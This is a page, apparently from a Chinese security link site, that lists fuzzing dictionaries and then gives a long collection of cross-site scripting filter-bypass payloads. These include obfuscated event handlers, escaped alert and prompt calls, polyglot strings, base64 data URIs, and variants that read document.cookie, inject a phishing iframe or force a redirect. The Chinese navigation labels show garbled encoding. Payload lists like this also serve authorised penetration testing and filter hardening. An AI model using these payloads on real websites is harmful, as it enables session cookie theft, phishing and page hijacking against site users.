Home
/
fuzz
返回主页
Fuzz瀛楀吀
XXEDicts
apiDict
ctfDict
directoryDicts
easyXssPayload
images
js
lotDict
paramDict
passwordDict
payload瀛楀吀
rcePayloads
routerDicts
spring
sqlDict
ssrfDicts
subdomainDicts
uploadFileExtDicts
userNameDict
鍙傛暟瀛楀吀
鐢ㄦ埛鍚嶅拰瀵嗙爜
xss bypass ``` <input/%00/autofocus=""/%00/onfocus=.1|alert`XSS`> ``` ``` <h1/%6f%6e/oNclicK=alert`hacked`> ``` ``` "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F ``` ``` "><style> @keyframes x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS< ``` ``` < a href="/*">*/)}); function+__MobileAppList(){alert(1)}//> ``` ``` <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> ``` ``` jaVasCript:/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e ``` ``` %22%3E%3Casuka%20AutoFocus%20ContentEditable%20OnFocusIn%3D_%3Dalert%2C_%28document.cookie%29%3E ``` ``` [email]a@a.a?[email=a@a.a?onmouseover=alert(1) a]a[/email][/email] ``` ``` \"+confirm(1)+" ``` ``` <h1 onclick=\u0041\u006cert("_XSS_")>XSS</h1> <a onclick=\u0041\u006cert("_XSS_")>XSS</a> <p onclick=\u0041\u006cert("_XSS_")>XSS</p> <marquee onclick=\u0041\u006cert("_XSS_")>XSS</marquee> ``` ``` onMouseOver=<script>alert("/XSS BY XSS/")</script> </script><h1 onmouseover= top[8680439..toString(30)]("_XSS_")> </script><h1 onmouseover=top[/al/.source+/ert/.source]("_XSS_")> </script><h1 onmouseover=["_XSS_"].find(alert)> </script><h1 onmouseover= (((confirm)))`_XSS_`> ``` ``` <input onblur=top[/al/.source+/ert/.source]("_XSS!_") autofocus><input autofocus> <input onblur=["_XSS!_"].find(alert) autofocus><input autofocus> <input onblur=(((confirm)))("_XSS!_") autofocus><input autofocus> ``` ``` <p/onclick=%27new%20Function`al\ert\`\u0059\u0030\u0030\u0030\``%27>d <p/onclick=self[`aler`%2b`t`]`\u0059\u0030\u0030\u0030`>d ``` ``` <form><button formaction=javascript:alert('xss_by_XSS')>_XSS_ <marquee><form><button formacti\u006fn=javascript:pr\u006fmpt('xss_by_XSS')>_XSS_</marquee> ``` ``` <img/src=%27https://i.imgur.com/kkum7k2.jpg%27%20onmouseover=prompt("_XSS_") ``` ``` <Img src="/" =_=" title=" onerror='prompt(document.cookie)'"> ``` ``` <marquee direction="down" width="250" height="200" behavior="alternate" style="border:solid"> <marquee behavior="alternate"> Xss by XSS0 </marquee> <marquee behavior="alternate"> XSS0 </marquee> </marquee> ``` ``` <marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>XSS0</marquee> ``` ``` "onfocus="alert('XSS0')"+autofocus=" </script><!--><svg onload=[document.domain].find%26%2340;alert%26rpar;> "><svg/onload=alert`${'000'}¥000!.was.here$`> <svg/onload=eval("ale"+"rt")(`✓${alert`✓`}`)> ``` ``` <noscript><p title="</noscript><img src=x onerror=alert(1)>"> ``` ``` <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object> ``` ``` <img src="x" onerror="document.write('<iframe src=tu_phishing></iframe>')"/> ``` ``` <marquee loop=1 width=0 onfinish=\u0070\u0072\u006f\u006d\u0070\u0074(document.cookie)>XSS0</marquee> ``` ``` "><details/open/ontoggle=confirm("/xss_by_XSS/")> ``` ``` <script> for(;;) alert("_XSS_")</script> <meta%20http-equiv="refresh"%20content="0;"> " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=``;alert`_XSS_`//> ``` ``` "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e " ``` ``` /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e ``` ``` <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)"/>click ``` ``` {{this.constructor.constructor('alert("foo")')()}} ``` ``` <ijavascriptmg+src+ojavascriptnerror=confirm(1)> ``` ``` <svg%0Aonauxclick=0;[1].some(confirm)// ``` ``` <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> ``` ``` <script>eval('\\u'+'0061'+'lert`_Y000!_`')</script> ``` ``` <script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> ``` ``` <script>throw~delete~typeof~prompt`_Y000!_`</script> ``` ``` <script>(()=>{return this})().alert`_Y000!_`</script> ``` ``` <html \" onmouseover=/*<svg/*/onload=alert(2)//> ``` ``` <%00EEEE<svg /\/\//ONLoad='a\u006c\u0065\u0072\u0074(1)'/\/\/\>svg>%0APayload ``` ``` %ff<!---><svg/onload=top[/al/.source+/ert/.source]()> ```
复制
0xShe 网络安全导航 sbbbb.cn